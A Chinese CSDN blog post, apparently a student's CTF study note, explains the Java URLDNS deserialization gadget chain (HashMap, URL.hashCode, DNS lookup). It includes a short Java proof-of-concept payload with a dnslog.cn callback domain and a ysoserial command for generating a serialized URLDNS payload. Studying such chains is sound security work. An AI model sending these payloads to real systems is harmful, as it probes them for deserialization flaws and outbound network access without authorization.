JAVA--URLDNS链

于 2024-08-03 08:00:00 发布
阅读量247 收藏 4
点赞数 9
分类专栏: # owasp top10 # CTF+靶场 文章标签: java 开发语言 网络安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140880387
版权

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做分享...

目录

官方库网址

URLDNS链

 HashMap  (数据集合结构)

原理

利用点:

payload.java

ysoserial-all.jar工具

官方库网址

https://mvnrepository.com/

URLDNS链

URLDNS链
一句话总结:
不需要其他依赖,原生java库,支持反序列化后,触发一次dns请求

 HashMap  (数据集合结构)

HashMap  (数据集合结构)
--存放 键值对 的集合.
Map map
为了验证键有没有重复,会对 键 进行取 哈希值 操作.
hashCode  相同,就认为集合里面有这个键了,为了避免一个键对应多个值,所以会覆盖.
(key相同,hashcode就相同;后面再赋值就会覆盖key-value)

 

原理

URLDNS链:

利用两个类
HashMap 和 URL 类
HashMap存在 readObject方法,里面调用了  hash方法,处理自己的key
hash方法,调用了key的hashCode方法
当我们传入的KEY是URL对象的时候,就会调用URL对象的hashCode
URL类的hashCode方法,只要自己的hashCode不是-1 ,就会调用自己handler属性的hashCode方法
handler是URLStreamHandler类,它的hashCode方法
调用了getHostAddress方法
调用了URL类的getHostAddress方法
最终调用了 InetAddress.getByName(host); 实现了一次DNS请求.

利用点:

1 验证反序列化漏洞存在 ,适合poc用.
2 判断对方服务器是否出网.
//只能发送一次DNS请求!

payload.java

        Map map = new HashMap<Object,Object>();

        URL url = new URL("http://success.qpronc.dnslog.cn");

        Field field = Class.forName("java.net.URL").getDeclaredField("hashCode");
        field.setAccessible(true);

        field.set(url,1);
        map.put(url,"ctfshow");
        field.set(url,-1);

        byte[] data = SerializeUtil.serialize(map);

        SerializeUtil.unSerialize(data);

 

ysoserial-all.jar工具

支持多种payload生成

java -jar ysoxxx.jar URLDNS 'dns url' >1.ser
# 生成反序列化payload

 

金灰
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JAVA反序列化漏洞-ysoserial-URLDNS分析
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-29 865
对于进行反序列化漏洞原理的学习,URLDNS这条比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
JAVA反序列化漏洞-ysoserial-URLDNS分析,网络安全面试项目全代码
m0_61369523的博客
04-05 857
对于进行反序列化漏洞原理的学习,URLDNS这条比较好理解,对后续学习打个基础,URLDNS也是经常用于验证Java反序列化漏洞是否存在,验证服务主机是否出网等情况,为了后期进一步有效性的利用。让我们开始学习吧!
java-URLDNS分析
qq_62613905的博客
01-29 342
URLDNS分析
Java安全】ysoserial-URLDNS分析
网络安全从业者的学习笔记
02-06 1809
Java安全中经常会提到反序列化,一个将Java对象转换为字节序列传输(或保存)并在接收字节序列后反序列化为Java对象的机制,在传输(或保存)的过程中,恶意攻击者能够将传输的字节序列替换为恶意代码进而触发反序列化漏洞。其中最经典的反序列化漏洞利用工具——ysoserial,下面就分析学习一下ysoserial中的URLDNS,以便更好地理解反序列化漏洞。
java url dns_JAVA反序列化-ysoserial-URLDNS
weixin_42557537的博客
02-24 419
前言推荐阅读时间:10min内容-基础向:在IDEA中JAR的三种调试方式Ysoserial工具中URLDNS模块的原理分析POC代码以及Ysoserial的源码分析题外话:最近有一个小伙伴用**x@v.team**的邮箱戳我,已经写好了回件但是由于找不到这个邮箱地址回不回去。莫非用了伪装源地址的骚操作?但是为啥这么做呢emmm…..如果你看到这篇文的话,可以再私戳我认领下回信…..在IDEA中J...
java反序列化-URLDNS
GalaxySpaceX的博客
02-23 235
java反序列化-URLDNS分析
Java安全 URLDNS分析
Elite的博客
02-12 1747
URLDNSJava安全中比较简单的一条利用,无需使用任何第三方库,全依靠Java内置的一些类实现,理解好URLDNS,那么接下来对CC的学习就会简单许多。
JAVA安全-URLDNS分析
GJ_ia的博客
01-11 207
URLDNS是ysoserial中一个利用的名字,但准确来说,这个其实不能称作“利⽤”。因为其参数不是⼀个可以“利⽤”的命令,⽽仅为⼀个URL,其能触发的结果也不是命令执⾏,⽽是⼀次DNS请求。先说一下整个的过程我们可以通过这条很容易判断是否存在反序列化漏洞。
java反序列化之URLDNS学习
dayouzi的博客
04-25 776
1、Java 序列化是指把 Java 对象转换为字节序列的过程。ObjectOutputStream类的 writeObject() 方法可以实现序列化。2、Java 反序列化是指把字节序列恢复为 Java 对象的过程。ObjectInputStream 类的 readObject() 方法用于反序列化。
S02-URLDNS反序列化构造1
08-03
总的来说,`S02-URLDNS反序列化构造1`是一个利用Java反序列化漏洞的实例,通过精心构造的序列化对象和`SilentURLStreamHandler`,可以在反序列化过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
Java反序列化入门之URLDNS1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
开源bbs源码java-http-protocol:输入URL到页面加载的过程
06-06
java 从输入URL到页面加载的过程 由一道题完善自己的前端知识体系 目录 从浏览器接收url到开启网络请求线程(浏览器的机制以及进程与线程之间的关系) 开启网络线程到发出一个完整的http请求(dns查询,tcp/ip请求,五层...
URLDNS反序列化学习.doc
07-09
URLDNS反序列化学习】文档主要涉及的是Java中的一个安全问题,即URLDNS反序列化。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
JavaJNDI 数据接池及 属性文件读取数据接信息
01-02
JavaJNDI(Java Naming and Directory Interface)是Java平台中用于访问命名和目录服务的一组API,它允许Java应用程序查找和管理分布在不同网络环境中的资源。数据连接池(Connection Pool)是Java应用中用于管理...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 591
1.导入hutool的maven依赖。2.复制一下代码执行。
社区养老服务小程序的设计
Karen198的博客
07-31 506
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
深入理解Java注解
最新发布
weixin_55745942的博客
08-01 548
Java注解是用来描述程序元素(如类、方法、变量等)的一种机制。它们可以提供关于程序的补充信息,帮助编译器、框架或其他工具更好地理解和处理代码。注解通常以符号开头,后跟注解名称和可能的参数。要创建自定义注解,需要使用@interface关键字定义一个接口,并在接口中声明注解的属性。这个注解名为,可以被用来标记方法。它有一个名为value的属性,具有默认值"default"。
JavaSE面向对象进阶
qq_45348840的博客
07-30 471
需求:在实际开发中,经常会遇到一些数组使用的工具类;请按照如下要求编写一个数组的工具类:ArrayUtil提供一个工具类方法printArr,用于返回整数数组的内容。返回的字符串格式如:[10,20,50,34,100 ](只考虑整数数组,且只考虑一维数组)提供这样一个工具方法getAerage,用于返回平均分。(只考虑浮点型数组,且只考虑一维数组)定义一个测试类TestDemo,调用该工具类的工具方法,并返回结果。// 私有化构造方法// 定义静态方法,方便调用。i++) {
Java网络编程:Socket与数据报通信
"第9章 网络编程技术主要涵盖了网络编程的基础知识,包括TCP/IP协议的四层结构,常用网络协议,以及IP地址和URL类的使用。此外,章节详细讲解了Socket通信和数据报通信,最后通过综合应用举例来巩固理论知识。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值